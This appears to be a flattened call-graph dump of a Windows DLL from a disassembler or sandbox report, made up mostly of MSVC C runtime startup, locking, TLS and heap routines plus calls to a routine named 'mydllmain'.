__DllMainCRTStartup@12 17 API calls 15361->15362 15363 6f9eaf9d DeleteCriticalSection 15362->15363 15363->15361 15364 6f9eafb8 15363->15364 15365 6f9ee7c4 ___free_lconv_mon 17 API calls 15364->15365 15366 6f9eafc3 15365->15366 15368 6f9efe60 ___scrt_is_nonwritable_in_current_image 15367->15368 15377 6f9f189f EnterCriticalSection 15368->15377 15370 6f9efed7 15378 6f9efef6 15370->15378 15372 6f9efe6b 15372->15370 15374 6f9efeab DeleteCriticalSection 15372->15374 15376 6f9eb217 __DllMainCRTStartup@12 80 API calls 15372->15376 15375 6f9ee7c4 ___free_lconv_mon 17 API calls 15374->15375 15375->15372 15376->15372 15377->15372 15381 6f9f18e7 LeaveCriticalSection 15378->15381 15380 6f9efee3 15380->15361 15381->15380 12827 6f9e2eb9 12828 6f9e2ef7 12827->12828 12829 6f9e2ec4 12827->12829 12874 6f9e3013 12828->12874 12831 6f9e2ee9 12829->12831 12832 6f9e2ec9 12829->12832 12839 6f9e2f0c 12831->12839 12834 6f9e2ece 12832->12834 12835 6f9e2edf 12832->12835 12838 6f9e2ed3 12834->12838 12861 6f9e3531 12834->12861 12866 6f9e3512 12835->12866 12840 6f9e2f18 ___scrt_is_nonwritable_in_current_image 12839->12840 12903 6f9e35a2 12840->12903 12842 6f9e2fe1 12842->12838 12843 6f9e2f1f __DllMainCRTStartup@12 12843->12842 12844 6f9e300b 12843->12844 12845 6f9e2f46 12843->12845 12934 6f9e3741 IsProcessorFeaturePresent 12844->12934 12914 6f9e3504 12845->12914 12848 6f9e3012 12853 6f9e2f63 12922 6f9ec3ba 12853->12922 12854 6f9e2f95 ___scrt_is_nonwritable_in_current_image 12854->12842 12857 6f9e2fcd mydllmain 12854->12857 12857->12842 12859 6f9e2f82 12859->12854 12930 6f9ec38f 12859->12930 13226 6f9ed03b 12861->13226 13433 6f9e4a6c 12866->13433 12869 6f9e351b 12869->12838 12872 6f9e352e 12872->12838 12873 6f9e4a77 26 API calls 12873->12869 12876 6f9e301f ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12874->12876 12875 6f9e3028 12875->12838 12876->12875 12877 6f9e30bb 12876->12877 12878 6f9e3050 12876->12878 12879 6f9e3741 __DllMainCRTStartup@12 4 API calls 12877->12879 13453 6f9e3572 12878->13453 12884 6f9e30c2 ___scrt_is_nonwritable_in_current_image 12879->12884 12881 6f9e3055 13462 6f9e3434 12881->13462 12887 6f9e30f8 dllmain_raw 12884->12887 12888 6f9e30f3 12884->12888 12900 6f9e30de 12884->12900 12886 6f9e305f __DllMainCRTStartup@12 13469 6f9e3713 12886->13469 12889 6f9e3112 dllmain_crt_dispatch 12887->12889 12887->12900 13478 6f9e1000 12888->13478 12889->12888 12889->12900 12895 6f9e3164 12896 6f9e316d dllmain_crt_dispatch 12895->12896 12895->12900 12897 6f9e3180 dllmain_raw 12896->12897 12896->12900 12897->12900 12898 6f9e1000 __DllMainCRTStartup@12 148 API calls 12899 6f9e314b 12898->12899 12901 6f9e3013 __DllMainCRTStartup@12 167 API calls 12899->12901 12900->12838 12902 6f9e3159 dllmain_raw 12901->12902 12902->12895 12904 6f9e35ab 12903->12904 12938 6f9e393b IsProcessorFeaturePresent 12904->12938 12908 6f9e35bc 12909 6f9e35c0 12908->12909 12948 6f9ed01e 12908->12948 12909->12843 12912 6f9e35d7 12912->12843 13220 6f9e35db 12914->13220 12916 6f9e2f55 12916->12854 12917 6f9e385e 12916->12917 12918 6f9e386e 12917->12918 12919 6f9e2f5e 12917->12919 12918->12919 12920 6f9e3875 mydllmain 12918->12920 12921 6f9e3428 InitializeSListHead 12919->12921 12920->12918 12921->12853 12923 6f9ec3c6 12922->12923 12924 6f9e2f77 12923->12924 12925 6f9ec3cc mydllmain 12923->12925 12924->12854 12926 6f9e34d9 12924->12926 12925->12923 12927 6f9e34de ___scrt_release_startup_lock 12926->12927 12928 6f9e393b IsProcessorFeaturePresent 12927->12928 12929 6f9e34e7 12927->12929 12928->12929 12929->12859 12931 6f9ec39d 12930->12931 12932 6f9ec3b6 12930->12932 12931->12932 12933 6f9ec3a4 mydllmain 12931->12933 12932->12854 12933->12931 12935 6f9e3757 __InternalCxxFrameHandler __fread_nolock 12934->12935 12936 6f9e3802 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12935->12936 12937 6f9e3846 __InternalCxxFrameHandler 12936->12937 12937->12848 12939 6f9e35b7 12938->12939 12940 6f9e4a4d 12939->12940 12957 6f9e5af7 12940->12957 12943 6f9e4a56 12943->12908 12945 6f9e4a5e 12946 6f9e4a69 12945->12946 12971 6f9e5b33 12945->12971 12946->12908 13015 6f9f2e90 12948->13015 12951 6f9e4a7f 12952 6f9e4a88 12951->12952 12953 6f9e4a92 12951->12953 12954 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 12952->12954 12953->12909 12955 6f9e4a8d 12954->12955 12956 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12955->12956 12956->12953 12958 6f9e5b00 12957->12958 12960 6f9e5b29 12958->12960 12961 6f9e4a52 12958->12961 12975 6f9e5d3c 12958->12975 12962 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12960->12962 12961->12943 12963 6f9e4b85 12961->12963 12962->12961 12993 6f9e5c4d 12963->12993 12966 6f9e4b9a 12966->12945 12969 6f9e4bb5 12969->12945 12972 6f9e5b5d 12971->12972 12973 6f9e5b3e 12971->12973 12972->12943 12974 6f9e5b48 DeleteCriticalSection 12973->12974 12974->12972 12974->12974 12981 6f9e5b62 12975->12981 12978 6f9e5d5f mydllmain 12980 6f9e5d72 12978->12980 12979 6f9e5d74 InitializeCriticalSectionAndSpinCount 12979->12980 12980->12958 12982 6f9e5b83 12981->12982 12983 6f9e5b7f 12981->12983 12982->12983 12984 6f9e5beb GetProcAddress 12982->12984 12986 6f9e5bdc 12982->12986 12988 6f9e5c02 LoadLibraryExW 12982->12988 12983->12978 12983->12979 12984->12983 12986->12984 12987 6f9e5be4 FreeLibrary 12986->12987 12987->12984 12989 6f9e5c49 12988->12989 12990 6f9e5c19 GetLastError 12988->12990 12989->12982 12990->12989 12991 6f9e5c24 ___vcrt_FlsSetValue 12990->12991 12991->12989 12992 6f9e5c3a LoadLibraryExW 12991->12992 12992->12982 12994 6f9e5b62 ___vcrt_FlsSetValue 5 API calls 12993->12994 12995 6f9e5c67 12994->12995 12996 6f9e5c80 TlsAlloc 12995->12996 12997 6f9e5c70 mydllmain 12995->12997 12998 6f9e4b8f 12997->12998 12998->12966 12999 6f9e5cfe 12998->12999 13000 6f9e5b62 ___vcrt_FlsSetValue 5 API calls 12999->13000 13001 6f9e5d18 13000->13001 13002 6f9e5d27 mydllmain 13001->13002 13003 6f9e5d33 TlsSetValue 13001->13003 13004 6f9e4ba8 13002->13004 13003->13004 13004->12969 13005 6f9e4bb8 13004->13005 13006 6f9e4bc2 13005->13006 13007 6f9e4bc8 13005->13007 13009 6f9e5c88 13006->13009 13007->12966 13010 6f9e5b62 ___vcrt_FlsSetValue 5 API calls 13009->13010 13011 6f9e5ca2 13010->13011 13012 6f9e5cae mydllmain 13011->13012 13013 6f9e5cba TlsFree 13011->13013 13014 6f9e5cb8 13012->13014 13013->13014 13014->13007 13016 6f9e35c9 13015->13016 13019 6f9f2ea0 13015->13019 13016->12912 13016->12951 13017 6f9f2ea8 mydllmain 13022 6f9ee688 13017->13022 13018 6f9f2ebe 13018->13016 13020 6f9f2ed6 mydllmain 13018->13020 13019->13017 13019->13018 13020->13018 13023 6f9ee694 ___scrt_is_nonwritable_in_current_image 13022->13023 13034 6f9f189f EnterCriticalSection 13023->13034 13025 6f9ee69b 13035 6f9f3344 13025->13035 13027 6f9ee6b9 13059 6f9ee6df 13027->13059 13034->13025 13036 6f9f3350 ___scrt_is_nonwritable_in_current_image 13035->13036 13037 6f9f337a 13036->13037 13038 6f9f3359 13036->13038 13062 6f9f189f EnterCriticalSection 13037->13062 13070 6f9ee7b1 13038->13070 13042 6f9f3386 13047 6f9f33b2 13042->13047 13063 6f9f3294 13042->13063 13075 6f9f33d9 13047->13075 13048 6f9ee522 GetStartupInfoW 13049 6f9ee53f 13048->13049 13050 6f9ee5d3 13048->13050 13049->13050 13051 6f9f3344 52 API calls 13049->13051 13054 6f9ee5d8 13050->13054 13052 6f9ee567 13051->13052 13052->13050 13053 6f9ee597 GetFileType 13052->13053 13053->13052 13055 6f9ee5df 13054->13055 13056 6f9ee622 GetStdHandle 13055->13056 13057 6f9ee684 13055->13057 13058 6f9ee635 GetFileType 13055->13058 13056->13055 13057->13027 13058->13055 13219 6f9f18e7 LeaveCriticalSection 13059->13219 13061 6f9ee6ca 13061->13019 13062->13042 13078 6f9ef9d8 13063->13078 13065 6f9f32a6 13069 6f9f32b3 13065->13069 13085 6f9efd31 13065->13085 13091 6f9ee7c4 13069->13091 13122 6f9ed968 GetLastError 13070->13122 13072 6f9ee7b6 13073 6f9ec276 13072->13073 13176 6f9ec1c2 13073->13176 13218 6f9f18e7 LeaveCriticalSection 13075->13218 13077 6f9ee6aa 13077->13027 13077->13048 13084 6f9ef9e5 __dosmaperr 13078->13084 13079 6f9efa25 13082 6f9ee7b1 __dosmaperr 16 API calls 13079->13082 13080 6f9efa10 RtlAllocateHeap 13081 6f9efa23 13080->13081 13080->13084 13081->13065 13082->13081 13084->13079 13084->13080 13097 6f9ec30c 13084->13097 13108 6f9efb4e 13085->13108 13087 6f9efd4d 13088 6f9efd6b InitializeCriticalSectionAndSpinCount 13087->13088 13089 6f9efd56 mydllmain 13087->13089 13090 6f9efd69 13088->13090 13089->13090 13090->13065 13092 6f9ee7cf HeapFree 13091->13092 13093 6f9ee7f9 13091->13093 13092->13093 13094 6f9ee7e4 GetLastError 13092->13094 13093->13042 13095 6f9ee7f1 __dosmaperr 13094->13095 13096 6f9ee7b1 __dosmaperr 15 API calls 13095->13096 13096->13093 13102 6f9ec338 13097->13102 13100 6f9ec31d mydllmain 13101 6f9ec32a 13100->13101 13101->13084 13103 6f9ec344 ___scrt_is_nonwritable_in_current_image 13102->13103 13104 6f9f189f __InternalCxxFrameHandler EnterCriticalSection 13103->13104 13105 6f9ec34f __InternalCxxFrameHandler 13104->13105 13106 6f9ec386 __dosmaperr LeaveCriticalSection 13105->13106 13107 6f9ec317 13106->13107 13107->13100 13107->13101 13109 6f9efb7e 13108->13109 13113 6f9efb7a __dosmaperr 13108->13113 13109->13113 13114 6f9efa83 13109->13114 13112 6f9efb98 GetProcAddress 13112->13113 13113->13087 13120 6f9efa94 ___vcrt_FlsSetValue 13114->13120 13115 6f9efb2a 13115->13112 13115->13113 13116 6f9efab2 LoadLibraryExW 13117 6f9efacd GetLastError 13116->13117 13118 6f9efb31 13116->13118 13117->13120 13118->13115 13119 6f9efb43 FreeLibrary 13118->13119 13119->13115 13120->13115 13120->13116 13121 6f9efb00 LoadLibraryExW 13120->13121 13121->13118 13121->13120 13123 6f9ed97e 13122->13123 13124 6f9ed984 13122->13124 13145 6f9efcb0 13123->13145 13128 6f9ed988 SetLastError 13124->13128 13151 6f9efcef 13124->13151 13128->13072 13130 6f9ef9d8 __dosmaperr 15 API calls 13131 6f9ed9b5 13130->13131 13132 6f9ed9ce 13131->13132 13133 6f9ed9bd 13131->13133 13135 6f9efcef __dosmaperr 7 API calls 13132->13135 13134 6f9efcef __dosmaperr 7 API calls 13133->13134 13139 6f9ed9cb 13134->13139 13136 6f9ed9da 13135->13136 13137 6f9ed9de 13136->13137 13138 6f9ed9f5 13136->13138 13140 6f9efcef __dosmaperr 7 API calls 13137->13140 13157 6f9ed619 13138->13157 13141 6f9ee7c4 ___free_lconv_mon 15 API calls 13139->13141 13140->13139 13141->13128 13144 6f9ee7c4 ___free_lconv_mon 15 API calls 13144->13128 13146 6f9efb4e __dosmaperr 5 API calls 13145->13146 13147 6f9efccc 13146->13147 13148 6f9efce7 TlsGetValue 13147->13148 13149 6f9efcd5 mydllmain 13147->13149 13150 6f9efce2 13149->13150 13150->13124 13152 6f9efb4e __dosmaperr 5 API calls 13151->13152 13153 6f9efd0b 13152->13153 13154 6f9efd29 TlsSetValue 13153->13154 13155 6f9efd14 mydllmain 13153->13155 13156 6f9ed9a0 13155->13156 13156->13128 13156->13130 13162 6f9ed4ad 13157->13162 13163 6f9ed4b9 ___scrt_is_nonwritable_in_current_image 13162->13163 13164 6f9f189f __InternalCxxFrameHandler EnterCriticalSection 13163->13164 13165 6f9ed4c3 13164->13165 13166 6f9ed4f3 __dosmaperr LeaveCriticalSection 13165->13166 13167 6f9ed4e1 13166->13167 13168 6f9ed5bf 13167->13168 13169 6f9ed5cb ___scrt_is_nonwritable_in_current_image 13168->13169 13170 6f9f189f __InternalCxxFrameHandler EnterCriticalSection 13169->13170 13171 6f9ed5d5 13170->13171 13172 6f9ed7a0 __dosmaperr 17 API calls 13171->13172 13173 6f9ed5ed 13172->13173 13174 6f9ed60d __dosmaperr LeaveCriticalSection 13173->13174 13175 6f9ed5fb 13174->13175 13175->13144 13177 6f9ec1d4 __wsopen_s 13176->13177 13182 6f9ec1f9 13177->13182 13183 6f9ec209 13182->13183 13187 6f9ec210 13182->13187 13200 6f9e64a1 GetLastError 13183->13200 13185 6f9ec21e 13188 6f9ec22d mydllmain 13185->13188 13187->13185 13204 6f9ec051 13187->13204 13190 6f9ec1ec 13188->13190 13189 6f9ec245 13189->13188 13191 6f9ec270 13189->13191 13194 6f9e609e 13190->13194 13207 6f9ec2a3 IsProcessorFeaturePresent 13191->13207 13193 6f9ec275 13195 6f9e60aa 13194->13195 13196 6f9e60c1 13195->13196 13211 6f9e64e7 13195->13211 13198 6f9e60d4 13196->13198 13199 6f9e64e7 __wsopen_s 50 API calls 13196->13199 13199->13198 13201 6f9e64ba 13200->13201 13202 6f9eda19 __wsopen_s 17 API calls 13201->13202 13203 6f9e64d2 SetLastError 13202->13203 13203->13187 13205 6f9ec05c GetLastError SetLastError 13204->13205 13206 6f9ec075 13204->13206 13205->13189 13206->13189 13208 6f9ec2af 13207->13208 13209 6f9ec07a __InternalCxxFrameHandler 8 API calls 13208->13209 13210 6f9ec2c4 GetCurrentProcess TerminateProcess 13209->13210 13210->13193 13212 6f9e64fa 13211->13212 13213 6f9e64f1 13211->13213 13212->13196 13214 6f9e64a1 __wsopen_s 19 API calls 13213->13214 13215 6f9e64f6 13214->13215 13215->13212 13216 6f9ed0c1 CallUnexpected 50 API calls 13215->13216 13217 6f9e6503 13216->13217 13218->13077 13219->13061 13221 6f9e35eb 13220->13221 13222 6f9e35e7 13220->13222 13223 6f9e3741 __DllMainCRTStartup@12 4 API calls 13221->13223 13225 6f9e35f8 ___scrt_release_startup_lock 13221->13225 13222->12916 13224 6f9e3661 13223->13224 13225->12916 13232 6f9ed7eb 13226->13232 13229 6f9e4a77 13412 6f9e4aba 13229->13412 13233 6f9ed7f5 13232->13233 13235 6f9e3536 13232->13235 13234 6f9efcb0 __dosmaperr 7 API calls 13233->13234 13236 6f9ed7fc 13234->13236 13235->13229 13236->13235 13237 6f9efcef __dosmaperr 7 API calls 13236->13237 13238 6f9ed80f 13237->13238 13240 6f9ed6b2 13238->13240 13241 6f9ed6cd 13240->13241 13242 6f9ed6bd 13240->13242 13241->13235 13246 6f9ed6d3 13242->13246 13245 6f9ee7c4 ___free_lconv_mon 17 API calls 13245->13241 13247 6f9ed6e8 13246->13247 13248 6f9ed6ee 13246->13248 13249 6f9ee7c4 ___free_lconv_mon 17 API calls 13247->13249 13250 6f9ee7c4 ___free_lconv_mon 17 API calls 13248->13250 13249->13248 13251 6f9ed6fa 13250->13251 13252 6f9ee7c4 ___free_lconv_mon 17 API calls 13251->13252 13253 6f9ed705 13252->13253 13254 6f9ee7c4 ___free_lconv_mon 17 API calls 13253->13254 13255 6f9ed710 13254->13255 13256 6f9ee7c4 ___free_lconv_mon 17 API calls 13255->13256 13257 6f9ed71b 13256->13257 13258 6f9ee7c4 ___free_lconv_mon 17 API calls 13257->13258 13259 6f9ed726 13258->13259 13260 6f9ee7c4 ___free_lconv_mon 17 API calls 13259->13260 13261 6f9ed731 13260->13261 13262 6f9ee7c4 ___free_lconv_mon 17 API calls 13261->13262 13263 6f9ed73c 13262->13263 13264 6f9ee7c4 ___free_lconv_mon 17 API calls 13263->13264 13265 6f9ed747 13264->13265 13266 6f9ee7c4 ___free_lconv_mon 17 API calls 13265->13266 13267 6f9ed755 13266->13267 13272 6f9ed4ff 13267->13272 13273 6f9ed50b ___scrt_is_nonwritable_in_current_image 13272->13273 13288 6f9f189f EnterCriticalSection 13273->13288 13275 6f9ed53f 13289 6f9ed55e 13275->13289 13277 6f9ed515 13277->13275 13279 6f9ee7c4 ___free_lconv_mon 17 API calls 13277->13279 13279->13275 13280 6f9ed56a 13281 6f9ed576 ___scrt_is_nonwritable_in_current_image 13280->13281 13293 6f9f189f EnterCriticalSection 13281->13293 13283 6f9ed580 13294 6f9ed7a0 13283->13294 13285 6f9ed593 13298 6f9ed5b3 13285->13298 13288->13277 13292 6f9f18e7 LeaveCriticalSection 13289->13292 13291 6f9ed54c 13291->13280 13292->13291 13293->13283 13295 6f9ed7af __dosmaperr 13294->13295 13297 6f9ed7d6 __dosmaperr 13294->13297 13295->13297 13301 6f9f3745 13295->13301 13297->13285 13411 6f9f18e7 LeaveCriticalSection 13298->13411 13300 6f9ed5a1 13300->13245 13308 6f9f375b 13301->13308 13326 6f9f37c5 13301->13326 13303 6f9ee7c4 ___free_lconv_mon 17 API calls 13304 6f9f37e7 13303->13304 13306 6f9ee7c4 ___free_lconv_mon 17 API calls 13304->13306 13305 6f9f378e 13307 6f9f37b0 13305->13307 13313 6f9ee7c4 ___free_lconv_mon 17 API calls 13305->13313 13309 6f9f37fa 13306->13309 13310 6f9ee7c4 ___free_lconv_mon 17 API calls 13307->13310 13308->13305 13311 6f9ee7c4 ___free_lconv_mon 17 API calls 13308->13311 13308->13326 13312 6f9ee7c4 ___free_lconv_mon 17 API calls 13309->13312 13314 6f9f37ba 13310->13314 13316 6f9f3783 13311->13316 13318 6f9f3808 13312->13318 13319 6f9f37a5 13313->13319 13320 6f9ee7c4 ___free_lconv_mon 17 API calls 13314->13320 13315 6f9f3881 13321 6f9ee7c4 ___free_lconv_mon 17 API calls 13315->13321 13329 6f9f3a62 13316->13329 13317 6f9f3821 13317->13315 13323 6f9ee7c4 17 API calls ___free_lconv_mon 13317->13323 13324 6f9ee7c4 ___free_lconv_mon 17 API calls 13318->13324 13357 6f9f3b60 13319->13357 13320->13326 13327 6f9f3887 13321->13327 13323->13317 13328 6f9f3813 13324->13328 13326->13303 13326->13328 13327->13297 13369 6f9f38b6 13328->13369 13330 6f9f3a73 13329->13330 13356 6f9f3b5c 13329->13356 13331 6f9f3a84 13330->13331 13332 6f9ee7c4 ___free_lconv_mon 17 API calls 13330->13332 13333 6f9ee7c4 ___free_lconv_mon 17 API calls 13331->13333 13335 6f9f3a96 13331->13335 13332->13331 13333->13335 13334 6f9f3aa8 13337 6f9f3aba 13334->13337 13338 6f9ee7c4 ___free_lconv_mon 17 API calls 13334->13338 13335->13334 13336 6f9ee7c4 ___free_lconv_mon 17 API calls 13335->13336 13336->13334 13339 6f9f3acc 13337->13339 13340 6f9ee7c4 ___free_lconv_mon 17 API calls 13337->13340 13338->13337 13341 6f9f3ade 13339->13341 13342 6f9ee7c4 ___free_lconv_mon 17 API calls 13339->13342 13340->13339 13343 6f9f3af0 13341->13343 13344 6f9ee7c4 ___free_lconv_mon 17 API calls 13341->13344 13342->13341 13345 6f9f3b02 13343->13345 13346 6f9ee7c4 ___free_lconv_mon 17 API calls 13343->13346 13344->13343 13347 6f9f3b14 13345->13347 13348 6f9ee7c4 ___free_lconv_mon 17 API calls 13345->13348 13346->13345 13349 6f9f3b26 13347->13349 13350 6f9ee7c4 ___free_lconv_mon 17 API calls 13347->13350 13348->13347 13351 6f9f3b38 13349->13351 13352 6f9ee7c4 ___free_lconv_mon 17 API calls 13349->13352 13350->13349 13353 6f9f3b4a 13351->13353 13354 6f9ee7c4 ___free_lconv_mon 17 API calls 13351->13354 13352->13351 13355 6f9ee7c4 ___free_lconv_mon 17 API calls 13353->13355 13353->13356 13354->13353 13355->13356 13356->13305 13358 6f9f3b6d 13357->13358 13368 6f9f3bc5 13357->13368 13359 6f9f3b7d 13358->13359 13361 6f9ee7c4 ___free_lconv_mon 17 API calls 13358->13361 13360 6f9f3b8f 13359->13360 13362 6f9ee7c4 ___free_lconv_mon 17 API calls 13359->13362 13363 6f9ee7c4 ___free_lconv_mon 17 API calls 13360->13363 13364 6f9f3ba1 13360->13364 13361->13359 13362->13360 13363->13364 13365 6f9ee7c4 ___free_lconv_mon 17 API calls 13364->13365 13366 6f9f3bb3 13364->13366 13365->13366 13367 6f9ee7c4 ___free_lconv_mon 17 API calls 13366->13367 13366->13368 13367->13368 13368->13307 13370 6f9f38c3 13369->13370 13374 6f9f38e2 13369->13374 13370->13374 13375 6f9f3bee 13370->13375 13373 6f9ee7c4 ___free_lconv_mon 17 API calls 13373->13374 13374->13317 13376 6f9f38dc 13375->13376 13377 6f9f3bff 13375->13377 13376->13373 13378 6f9f3bc9 __dosmaperr 17 API calls 13377->13378 13379 6f9f3c07 13378->13379 13380 6f9f3bc9 __dosmaperr 17 API calls 13379->13380 13381 6f9f3c12 13380->13381 13382 6f9f3bc9 __dosmaperr 17 API calls 13381->13382 13383 6f9f3c1d 13382->13383 13384 6f9f3bc9 __dosmaperr 17 API calls 13383->13384 13385 6f9f3c28 13384->13385 13386 6f9f3bc9 __dosmaperr 17 API calls 13385->13386 13387 6f9f3c36 13386->13387 13388 6f9ee7c4 ___free_lconv_mon 17 API calls 13387->13388 13389 6f9f3c41 13388->13389 13390 6f9ee7c4 ___free_lconv_mon 17 API calls 13389->13390 13391 6f9f3c4c 13390->13391 13392 6f9ee7c4 ___free_lconv_mon 17 API calls 13391->13392 13393 6f9f3c57 13392->13393 13394 6f9f3bc9 __dosmaperr 17 API calls 13393->13394 13395 6f9f3c65 13394->13395 13396 6f9f3bc9 __dosmaperr 17 API calls 13395->13396 13397 6f9f3c73 13396->13397 13398 6f9f3bc9 __dosmaperr 17 API calls 13397->13398 13399 6f9f3c84 13398->13399 13400 6f9f3bc9 __dosmaperr 17 API calls 13399->13400 13401 6f9f3c92 13400->13401 13402 6f9f3bc9 __dosmaperr 17 API calls 13401->13402 13403 6f9f3ca0 13402->13403 13404 6f9ee7c4 ___free_lconv_mon 17 API calls 13403->13404 13405 6f9f3cab 13404->13405 13406 6f9ee7c4 ___free_lconv_mon 17 API calls 13405->13406 13407 6f9f3cb6 13406->13407 13408 6f9ee7c4 ___free_lconv_mon 17 API calls 13407->13408 13409 6f9f3cc1 13408->13409 13410 6f9ee7c4 ___free_lconv_mon 17 API calls 13409->13410 13410->13376 13411->13300 13413 6f9e4ac4 13412->13413 13419 6f9e353b 13412->13419 13420 6f9e5cc3 13413->13420 13416 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13417 6f9e4ada 13416->13417 13426 6f9e4a9e 13417->13426 13419->12838 13421 6f9e5b62 ___vcrt_FlsSetValue 5 API calls 13420->13421 13422 6f9e5cdd 13421->13422 13423 6f9e5ce9 mydllmain 13422->13423 13424 6f9e5cf5 TlsGetValue 13422->13424 13425 6f9e4acb 13423->13425 13424->13425 13425->13416 13427 6f9e4aa8 13426->13427 13428 6f9e4ab5 13426->13428 13427->13428 13430 6f9eb928 13427->13430 13428->13419 13431 6f9ee7c4 ___free_lconv_mon 17 API calls 13430->13431 13432 6f9eb940 13431->13432 13432->13428 13439 6f9e4af3 13433->13439 13435 6f9e3517 13435->12869 13436 6f9ed030 13435->13436 13437 6f9ed968 __dosmaperr 17 API calls 13436->13437 13438 6f9e3523 13437->13438 13438->12872 13438->12873 13440 6f9e4aff GetLastError 13439->13440 13441 6f9e4afc 13439->13441 13442 6f9e5cc3 ___vcrt_FlsGetValue 7 API calls 13440->13442 13441->13435 13444 6f9e4b14 13442->13444 13443 6f9e4b79 SetLastError 13443->13435 13444->13443 13445 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13444->13445 13452 6f9e4b33 13444->13452 13446 6f9e4b2d __InternalCxxFrameHandler 13445->13446 13447 6f9e4b55 13446->13447 13448 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13446->13448 13446->13452 13449 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13447->13449 13450 6f9e4b69 13447->13450 13448->13447 13449->13450 13451 6f9eb928 ___vcrt_freefls@4 17 API calls 13450->13451 13451->13452 13452->13443 13454 6f9e3577 ___scrt_release_startup_lock 13453->13454 13455 6f9e357b 13454->13455 13458 6f9e3587 __DllMainCRTStartup@12 13454->13458 13483 6f9ece9a 13455->13483 13457 6f9e3585 13457->12881 13459 6f9e3594 13458->13459 13487 6f9ec683 13458->13487 13459->12881 13567 6f9e4a2a InterlockedFlushSList 13462->13567 13465 6f9e388a 13466 6f9e389a 13465->13466 13467 6f9e38b2 13465->13467 13466->13467 13468 6f9e38a1 mydllmain 13466->13468 13467->12886 13468->13466 13470 6f9e371f 13469->13470 13471 6f9e3079 13470->13471 13571 6f9ed043 13470->13571 13475 6f9e30b5 13471->13475 13473 6f9e372d 13474 6f9e4a7f ___scrt_uninitialize_crt 8 API calls 13473->13474 13474->13471 13675 6f9e3595 13475->13675 13479 6f9e100d 13478->13479 13480 6f9e1007 13478->13480 13693 6f9e2959 13479->13693 13480->12895 13480->12898 13484 6f9ecea6 __EH_prolog3 13483->13484 13498 6f9ecd65 13484->13498 13486 6f9ececd __DllMainCRTStartup@12 13486->13457 13488 6f9ec6b0 13487->13488 13496 6f9ec6c1 13487->13496 13517 6f9ec74b GetModuleHandleW 13488->13517 13493 6f9ec6ff 13493->12881 13525 6f9ec54e 13496->13525 13499 6f9ecd71 ___scrt_is_nonwritable_in_current_image 13498->13499 13506 6f9f189f EnterCriticalSection 13499->13506 13501 6f9ecd7f 13507 6f9ecdc0 13501->13507 13506->13501 13508 6f9ecddf 13507->13508 13511 6f9ecd8c 13507->13511 13509 6f9ece6d 13508->13509 13510 6f9ece20 mydllmain 13508->13510 13508->13511 13509->13511 13512 6f9ee7c4 ___free_lconv_mon 17 API calls 13509->13512 13510->13508 13513 6f9ecdb4 13511->13513 13512->13511 13516 6f9f18e7 LeaveCriticalSection 13513->13516 13515 6f9ecd9d 13515->13486 13516->13515 13518 6f9ec6b5 13517->13518 13518->13496 13519 6f9ec7a6 GetModuleHandleExW 13518->13519 13520 6f9ec806 13519->13520 13521 6f9ec7e5 GetProcAddress 13519->13521 13523 6f9ec80c FreeLibrary 13520->13523 13524 6f9ec815 13520->13524 13521->13520 13522 6f9ec7f9 mydllmain 13521->13522 13522->13520 13523->13524 13524->13496 13526 6f9ec55a ___scrt_is_nonwritable_in_current_image 13525->13526 13540 6f9f189f EnterCriticalSection 13526->13540 13528 6f9ec564 13541 6f9ec59b 13528->13541 13533 6f9ec71a 13555 6f9ec78d 13533->13555 13535 6f9ec724 13536 6f9ec738 13535->13536 13537 6f9ec728 GetCurrentProcess TerminateProcess 13535->13537 13538 6f9ec7a6 __InternalCxxFrameHandler 4 API calls 13536->13538 13537->13536 13539 6f9ec740 ExitProcess 13538->13539 13540->13528 13543 6f9ec5a7 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 13541->13543 13542 6f9ec571 13551 6f9ec58f 13542->13551 13543->13542 13544 6f9ec5f5 13543->13544 13548 6f9ec5e5 mydllmain 13543->13548 13545 6f9ec60b 13544->13545 13549 6f9ece9a __DllMainCRTStartup@12 18 API calls 13544->13549 13546 6f9ec628 13545->13546 13550 6f9ec38f __InternalCxxFrameHandler mydllmain 13545->13550 13547 6f9ec38f __InternalCxxFrameHandler mydllmain 13546->13547 13547->13542 13548->13544 13549->13545 13550->13546 13554 6f9f18e7 LeaveCriticalSection 13551->13554 13553 6f9ec57d 13553->13493 13553->13533 13554->13553 13558 6f9f1923 13555->13558 13557 6f9ec792 __InternalCxxFrameHandler 13557->13535 13559 6f9f1932 __InternalCxxFrameHandler 13558->13559 13560 6f9f193f 13559->13560 13562 6f9efbd3 13559->13562 13560->13557 13563 6f9efb4e __dosmaperr 5 API calls 13562->13563 13564 6f9efbef 13563->13564 13565 6f9efbf8 mydllmain 13564->13565 13566 6f9efc07 13564->13566 13565->13566 13566->13560 13569 6f9e4a3a 13567->13569 13570 6f9e305a 13567->13570 13568 6f9eb928 ___vcrt_freefls@4 17 API calls 13568->13569 13569->13568 13569->13570 13570->13465 13572 6f9ed04e 13571->13572 13573 6f9ed060 13571->13573 13575 6f9ed05c 13572->13575 13578 6f9f01a6 13572->13578 13581 6f9f2ef8 13573->13581 13575->13473 13585 6f9f0037 13578->13585 13583 6f9f2f06 13581->13583 13584 6f9ed06f 13581->13584 13582 6f9f2f0e mydllmain 13582->13583 13583->13582 13583->13584 13584->13473 13588 6f9eff8b 13585->13588 13589 6f9eff97 ___scrt_is_nonwritable_in_current_image 13588->13589 13596 6f9f189f EnterCriticalSection 13589->13596 13591 6f9f000d 13605 6f9f002b 13591->13605 13594 6f9effa1 ___scrt_uninitialize_crt 13594->13591 13597 6f9efeff 13594->13597 13596->13594 13598 6f9eff0b ___scrt_is_nonwritable_in_current_image 13597->13598 13608 6f9eafcd EnterCriticalSection 13598->13608 13600 6f9eff15 ___scrt_uninitialize_crt 13601 6f9eff4e 13600->13601 13609 6f9f0141 13600->13609 13622 6f9eff7f 13601->13622 13674 6f9f18e7 LeaveCriticalSection 13605->13674 13607 6f9f0019 13607->13575 13608->13600 13610 6f9f0156 __wsopen_s 13609->13610 13611 6f9f015d 13610->13611 13612 6f9f0168 13610->13612 13613 6f9f0037 